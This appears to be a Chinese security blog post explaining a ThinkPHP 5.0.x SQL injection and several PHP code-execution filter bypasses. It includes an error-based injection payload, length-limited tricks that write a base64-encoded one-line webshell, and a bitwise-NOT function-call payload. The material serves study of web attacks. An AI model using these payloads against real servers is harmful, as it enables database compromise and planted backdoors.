thinkphp中的sql和代码执行

目录

thinkphp5漏洞sql注入

漏洞概要.

漏洞准备

漏洞分析

代码执行

限制条件1

1

2

限制条件

1

限制条件3

php7.x

php5


thinkphp5漏洞sql注入

漏洞概要.

本次漏洞存在于 Builder 类的 parseData 方法中。由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生。漏洞影响版本: 5.0.13<=ThinkPHP<=5.0.155.1.0<=ThinkPHP<=5.1.5 。这里使用thinkphp5015版本

漏洞准备

查看官方文档5.0.16修复更新内容

df88ac4e9c274810bf7eb6de7bad4343.png

漏洞分析

payload [0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1

526aab3c1c984c07b18a95690ad00868.png

2e705203390840f1b7aa64cc41e004a1.png

get请求传入username,进入db的inster方法,之后直接进入了 $this->builderinsert 方法

bce4c186a66e4978971518b613ca209e.png

在进入之后,在 insert 方法中,我们看到其调用 parseData 方法来分析并处理数据进入

这里0是inc 1是注入语句 2是1

ba4b4f1911f64d108d786eafcf913872.png

break之后这里执行替换函数

e783178f5ee1446dbb230375e91219c5.png

这里执行完之后拼接,value是注入语句

代码执行

限制条件1

<?php

$param = $_REQUEST['param']; If (

strlen($param) < 17 && stripos($param, 'eval') === false && stripos($param, 'assert') === false

) {

eval($param);

}

1

1380abc5bfdf4849a505fd6958da5e75.png

2

c693b6f2869c40bda50aa659da3a90e4.png

web.php?1=file_put_contents&param=$_GET[1](N,P,8);

/* 'PD9waHAgZXZhbCgkX1BPU1RbOV0pOw' ✲写入文件'N'中  */解码为一句话木马

逐个写入,最终伪协议解码执行执行

f97bda16d9c34a76a75aaad47717b941.png

限制条件

<?php
$param = $_REQUEST['param']; If ( strlen($param) < 8 ) { echo shell_exec($param);
}


1

www:~$ ls -t

ech\ o \  PD9\ waH\ AgZ\ XZh\ bCg\ kX0\ dFV\ Fsx\ XSk\ 7|\  bas\ e64\  -\  d>\  c.p\ hp

www:~$ echo PD9waHAgZXZhbCgkX0dFVFsxXSk7| base64 -d> c.php

▪ls -t 以创建时间来列出当前目录下所有文件

文件列表以[行符]分割每个文件

引入 `\` 转义ls时的换行

换行不影响命令执行

成功构造任意命令执行,写入Webshell

www:~$

w>hp

www:~$

w>c.p\\

www:~$

w>d\>\\

www:~$

w>\ -\\

www:~$

w>e64\\

www:~$

w>bas\\

www:~$

w>7\|\\

www:~$

w>XSk\\

...

www:~$

w>PD9\\

www:~$

w>o\ \\

www:~$

w>ech\\

www:~$

ls -t>0

www:~$

sh 0

667c5847027e470fae46c16e809e76ce.png

dcfbf579074c4edc88eb3c6c5270f224.png

2bb1bc55352e4229ab10c2bcb5aeae7d.png

限制条件3

php7.x

PHP7前是不允许用($a)();这样的方法来执行动态函数的,但PHP7中增加了对此的支持。所以,我们可以通过('phpinfo')();来执行函数,第一个括号中可以是任意PHP表达式。

先进行URL编码再取反,构造一个可以生成phpinfo这个字符串的PHP表达式即可。payload如下(不可见字符用url编码表示):(~%8F%97%8F%96%91%99%90)();

bc112fb913ba48fe83aec614a2dcf3bb.png

php5

上传文件修改数据包

``执行代码,用最后一位大写字母匹配,大写字母范围在@和]之间

05b75bbf4f3c46edba10b8b05c19742d.png

  • 12
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值